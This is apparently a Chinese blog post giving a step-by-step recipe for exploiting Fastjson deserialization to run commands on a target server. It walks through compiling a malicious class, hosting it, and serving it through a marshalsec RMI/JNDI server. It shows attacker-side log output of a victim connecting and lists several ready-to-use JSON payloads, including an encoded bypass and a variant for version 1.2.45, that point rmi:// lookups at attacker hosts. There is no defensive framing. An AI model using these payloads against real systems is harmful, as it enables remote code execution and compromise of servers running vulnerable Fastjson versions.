Fastjson命令执行

# Fastjson漏洞可以命令执行

攻击流程:
– 1.找一台装有java的机器,运行 javac ExportObject.java会得到ExportObject.class
– 2.将ExportObject.class放到外网http服务器上,比如。http://你的服务器ip/ExportObject.class
– 3.在外网服务器上运行java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://你的服务器ip/#ExportObject 10086 表示该http下的class转换成rmi服务
– 4.在目标站点运行

攻击方:
“`
root@test:~/tools/rmi# java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://183.2.xxx.xxx/#Exploit 10086

* Opening JRMP listener on 10086

Have connection from /121.xxx.xxx.xxx:55837

Reading message…

Is RMI.lookup call for Exploit 2

Sending remote classloading stub targeting http://183.2.xxx.xxx/Exploit.class

Closing connection
“`
1. 老的
“`
{“@type”:”com.sun.rowset.JdbcRowSetImpl”,”dataSourceName”:”rmi://恶意主机:端口/Object”,”autoCommit”:true}
{\”@type\”:\”LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;\”,\”dataSourceName\”:\”rmi://xxx.24.xxx.xxx:80/Object\”,\”autoCommit\”:true}
{“name”:{“@type”:”com.sun.rowset.JdbcRowSetImpl”,”dataSourceName”:”rmi://183.2.xxx.xxx:10086/Exploit”,”autoCommit”:true},age:12}
“`
2. 包括1.2.45的
“`
{“name”:{“@type”:”org.apache.ibatis.datasource.jndi.JndiDataSourceFactory”,”properties”:{“data_source”:”rmi://xxx.2.xxx.xxx:10086/Exploit”},”autoCommit”:true},age:12}
“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容